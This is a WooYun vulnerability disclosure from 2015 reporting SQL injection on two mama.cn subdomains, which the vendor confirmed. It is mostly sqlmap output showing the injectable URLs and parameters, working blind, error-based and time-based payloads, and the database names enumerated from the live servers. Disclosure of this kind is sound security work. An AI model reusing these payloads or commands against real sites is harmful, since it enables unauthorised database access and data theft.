当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111959

漏洞标题:妈妈网多处SQL注入漏洞

相关厂商:妈妈网

漏洞作者: 路人甲

提交时间:2015-05-04 17:17

修复时间:2015-06-18 18:32

公开时间:2015-06-18 18:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-04: 厂商已经确认,细节仅向厂商公开
2015-05-14: 细节向核心白帽子及相关领域专家公开
2015-05-24: 细节向普通白帽子公开
2015-06-03: 细节向实习白帽子公开
2015-06-18: 细节向公众公开

简要描述:

今天女票叫我睡觉,又想骗我,我才不会上当,果断来提交漏洞!。。。

详细说明:

来了:

QQ截图20150504152717.png

[root@Hacker~]# Sqlmap Sqlmap -u "http://brandbase.mama.cn/friso.php?forumid=122&mod=thread" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey al
[*] starting at 15:13:38
[15:13:38] [INFO] testing connection to the target URL
[15:13:38] [INFO] testing if the target URL is stable. This can take a couple of seconds
[15:13:41] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] y
[15:14:32] [INFO] testing if GET parameter 'forumid' is dynamic
[15:14:33] [INFO] confirming that GET parameter 'forumid' is dynamic
[15:14:34] [INFO] GET parameter 'forumid' is dynamic
[15:14:36] [WARNING] heuristic (basic) test shows that GET parameter 'forumid' might not be injectable
[15:14:36] [INFO] testing for SQL injection on GET parameter 'forumid'
[15:14:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:14:40] [WARNING] reflective value(s) found and filtering out
[15:14:40] [INFO] GET parameter 'forumid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:14:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:14:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:14:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:14:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:14:51] [INFO] testing 'MySQL inline queries'
[15:14:54] [INFO] testing 'PostgreSQL inline queries'
[15:14:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:14:55] [INFO] testing 'Oracle inline queries'
[15:14:56] [INFO] testing 'SQLite inline queries'
[15:14:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:14:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:14:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:15:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:16:01] [INFO] GET parameter 'forumid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[15:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:16:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique fou
[15:16:22] [INFO] target URL appears to be UNION injectable with 1 columns
[15:16:24] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql)
[15:16:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'forumid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[15:17:24] [INFO] testing if GET parameter 'mod' is dynamic
[15:17:24] [INFO] confirming that GET parameter 'mod' is dynamic
[15:17:25] [INFO] GET parameter 'mod' is dynamic
[15:17:25] [WARNING] heuristic (basic) test shows that GET parameter 'mod' might not be injectable
[15:17:25] [INFO] testing for SQL injection on GET parameter 'mod'
[15:17:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:17:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:17:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:17:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:17:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:17:42] [INFO] testing 'MySQL inline queries'
[15:17:45] [INFO] testing 'PostgreSQL inline queries'
[15:17:46] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:17:46] [INFO] testing 'Oracle inline queries'
[15:17:47] [INFO] testing 'SQLite inline queries'
[15:17:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:17:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:17:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:17:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:17:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:18:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:18:11] [INFO] testing 'Oracle AND time-based blind'
[15:18:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:18:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:19:12] [WARNING] GET parameter 'mod' is not injectable
sqlmap identified the following injection points with a total of 258 HTTP(s) requests:
---
Place: GET
Parameter: forumid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: forumid=122 AND 6940=6940&mod=thread
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: forumid=122 AND SLEEP(5)&mod=thread
---
[15:19:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL 5.0.11
[15:19:12] [INFO] fetching database names
[15:19:12] [INFO] fetching number of databases
[15:19:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:19:12] [INFO] retrieved: 4
[15:19:15] [INFO] retrieved: information_schema
[15:20:24] [INFO] retrieved: brand_common
[15:21:14] [INFO] retrieved: brands
[15:21:39] [INFO] retrieved: test
available databases [4]:
[*] brand_common
[*] brands
[*] information_schema
[*] test
[15:21:56] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled
[15:21:56] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\brandbase.mama.cn'

漏洞证明:

上图:

QQ截图20150504153226.png


QQ截图20150504153235.png

[root@Hacker~]# Sqlmap Sqlmap -u "http://zt.mama.cn/x2/index.php?c=aosmith&a=index&page2=1&keyWord2=&keyWord1=aa#smith-index-img" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey
[*] starting at 15:20:41
[15:20:41] [INFO] testing connection to the target URL
[15:20:42] [INFO] testing if the target URL is stable. This can take a couple of seconds
[15:20:43] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameter
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] y
[15:20:48] [INFO] testing if GET parameter 'c' is dynamic
[15:20:48] [INFO] confirming that GET parameter 'c' is dynamic
[15:20:49] [WARNING] GET parameter 'c' does not appear dynamic
[15:20:49] [WARNING] heuristic (basic) test shows that GET parameter 'c' might not be injectable
[15:20:49] [INFO] testing for SQL injection on GET parameter 'c'
[15:20:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:20:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:20:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:20:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:20:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:20:53] [INFO] testing 'MySQL inline queries'
[15:20:53] [INFO] testing 'PostgreSQL inline queries'
[15:20:54] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:20:54] [INFO] testing 'Oracle inline queries'
[15:20:54] [INFO] testing 'SQLite inline queries'
[15:20:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:20:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:20:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:20:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:20:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:20:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:20:58] [INFO] testing 'Oracle AND time-based blind'
[15:20:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:21:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:21:09] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using o
[15:21:19] [WARNING] GET parameter 'c' is not injectable
[15:21:19] [INFO] testing if GET parameter 'a' is dynamic
[15:21:19] [INFO] confirming that GET parameter 'a' is dynamic
[15:21:20] [WARNING] GET parameter 'a' does not appear dynamic
[15:21:20] [WARNING] heuristic (basic) test shows that GET parameter 'a' might not be injectable
[15:21:20] [INFO] testing for SQL injection on GET parameter 'a'
[15:21:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:21:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:21:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:21:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:21:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:21:36] [INFO] testing 'MySQL inline queries'
[15:21:36] [INFO] testing 'PostgreSQL inline queries'
[15:21:37] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:21:37] [INFO] testing 'Oracle inline queries'
[15:21:38] [INFO] testing 'SQLite inline queries'
[15:21:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:21:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:21:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:21:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:21:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:21:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:21:53] [INFO] testing 'Oracle AND time-based blind'
[15:21:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:22:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:22:53] [WARNING] GET parameter 'a' is not injectable
[15:22:53] [INFO] testing if GET parameter 'page2' is dynamic
[15:22:53] [WARNING] GET parameter 'page2' does not appear dynamic
[15:22:54] [WARNING] heuristic (basic) test shows that GET parameter 'page2' might not be injectable
[15:22:54] [INFO] testing for SQL injection on GET parameter 'page2'
[15:22:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:23:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:23:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:23:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:23:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:23:15] [INFO] testing 'MySQL inline queries'
[15:23:15] [INFO] testing 'PostgreSQL inline queries'
[15:23:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:23:16] [INFO] testing 'Oracle inline queries'
[15:23:17] [INFO] testing 'SQLite inline queries'
[15:23:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:23:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:23:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:23:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:23:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:23:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:23:34] [INFO] testing 'Oracle AND time-based blind'
[15:23:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:24:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:24:45] [WARNING] GET parameter 'page2' is not injectable
[15:24:45] [INFO] testing if GET parameter 'keyWord2' is dynamic
[15:24:46] [INFO] confirming that GET parameter 'keyWord2' is dynamic
[15:24:47] [INFO] GET parameter 'keyWord2' is dynamic
[15:24:47] [WARNING] heuristic (basic) test shows that GET parameter 'keyWord2' might not be injectable
[15:24:47] [INFO] testing for SQL injection on GET parameter 'keyWord2'
[15:24:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:24:48] [WARNING] reflective value(s) found and filtering out
[15:24:53] [INFO] GET parameter 'keyWord2' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[15:24:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[15:24:57] [INFO] GET parameter 'keyWord2' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[15:24:58] [INFO] testing 'MySQL inline queries'
[15:24:58] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:24:58] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:25:58] [INFO] GET parameter 'keyWord2' is 'MySQL > 5.0.11 AND time-based blind' injectable
[15:25:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:25:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique f
[15:26:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'keyWord2' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 616 HTTP(s) requests:
---
Place: GET
Parameter: keyWord2
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: c=aosmith&a=index&page2=1&keyWord2=' AND 1801=1801 AND 'nwfv'='nwfv&keyWord1=aa
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: c=aosmith&a=index&page2=1&keyWord2=' AND (SELECT 1410 FROM(SELECT COUNT(*),CONCAT(0x7161737271,(SELECT (CASE WHEN (1410=1410) THEN 1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: c=aosmith&a=index&page2=1&keyWord2=' AND SLEEP(5) AND 'Tare'='Tare&keyWord1=aa
---
[15:28:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[15:28:46] [INFO] fetching database names
[15:28:46] [INFO] the SQL query used returns 7 entries
[15:28:47] [INFO] retrieved: information_schema
[15:28:47] [INFO] retrieved: test
[15:28:48] [INFO] retrieved: try
[15:28:49] [INFO] retrieved: x
[15:28:49] [INFO] retrieved: x_new_zt
[15:28:49] [INFO] retrieved: zt
[15:28:50] [INFO] retrieved: zt2
available databases [7]:
[*] information_schema
[*] test
[*] try
[*] x
[*] x_new_zt
[*] zt
[*] zt2
[15:28:50] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandle
[15:28:50] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\zt.mama.cn'

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-04 18:30

厂商回复:

谢谢

最新状态:

暂无